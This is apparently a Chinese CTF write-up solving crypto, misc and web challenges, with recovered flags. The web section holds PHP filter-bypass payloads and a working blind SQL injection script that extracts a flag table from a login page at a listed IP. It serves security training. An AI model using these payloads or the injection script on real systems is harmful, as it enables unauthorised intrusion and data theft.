crypto

esay crypto

社会主义核心价值观编码

https://atool.vip/corevalue/

flag{IlUqU9O5guX6YiITsRNPiQmbhNRjGuTP}

a crypto

cipher一把梭

flag{W0w_y0u_c4n_rea11y_enc0d1ng!}

misc

NEW_Misc

解码后，查看输出文件

flag{verY_g00d_YoU_f0und_th1s}

流量分析

流量包拖到kali里，strings timu.pcapng|grep flag，发现是盲注的包

转成flag.txt，把substr函数第二个参数变化的前一行拖出来，把它们对应的ascii记录下来。

ascii转str的脚本

a = [102,108,97,103,123,119,49,114,101,115,104,65,82,75,95,101,122,95,49,115,110,116,105,116,125,126,126,126,126,60]
b = []
for i in a:
    b.append(chr(i))
    print(b)
print(''.join(b))

a_misc

web

middle_magic

第一关

?aaa=%0apass_the_level_1%23

php preg_match()绕过

%0a换行绕过

第二关

admin[]=1&root_pwd[]=2

第三关

php json_decode()绕过

可以利用0=="string"这种形式绕过

level_3={"result":0}

payload

GET

?aaa=%0apass_the_level_1%23

POST

admin[]=1&root_pwd[]=2&level_3={"result":0}

flag

flag{f03d41bf6c8d55f12324fd57f7a00427}

easy_sql_2

过滤了一些关键词，select、union、空格

database()——>ctf

表名 information_schema.tables过滤

information_schema.columns

https://blog.csdn.net/weixin_43536759/article/details/104848957

https://www.cnblogs.com/20175211lyz/p/12358725.html

https://blog.dkkkkk.com/basis/NoColumnInjection/#_1

# -*-coding:utf-8-*-
import requests

def bind_sql():
    flag = ""
    dic = "~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/-,+*)(&%$#!"
    for i in range(1,1000):
        f = flag
        for j in dic:
            _ = flag + j
            # payload = "11'||('ctf',binary'{}',1,2,3,4)<(table/**/mysql.innodb_table_stats/**/limit/**/1,1)#".format(_)
            #admin,fl11aag
            payload = "11'||(binary'{}')<(table/**/ctf.fl11aag/**/limit/**/1,1)#".format(_)
            print(payload)
            data = {
                "username": payload,
                "password": "admin"
            }
            res = requests.post(url=url, data=data)
            if 'success' in res.text:
                if j == '~':
                    flag = flag[:-1] + chr(ord(flag[-1])+1)
                    print(flag)
                    exit()
                flag += j
                print(flag)
                break
        if flag == f:
            break
    return flag

if __name__ == '__main__':
    url = 'http://182.116.62.85:26571/login.php'
    result = bind_sql()
    print(result)

EasyP

http://182.116.62.85:21895/index.php/utils.php/%80?%73%68%6f%77%5f%73%6f%75%72%63%65

参考——basename()函数，它会忽略后面的[x80-xff]范围内的字符串。

参考——$_SERVER['QUERY_STRING']不会进行urldecoe解码

flag{bsyxmK7ncU5nPjsGMckFo8kgq95qRasg}

spring

https://github.com/Medicean/VulApps/tree/master/s/springwebflow/1

本文链接：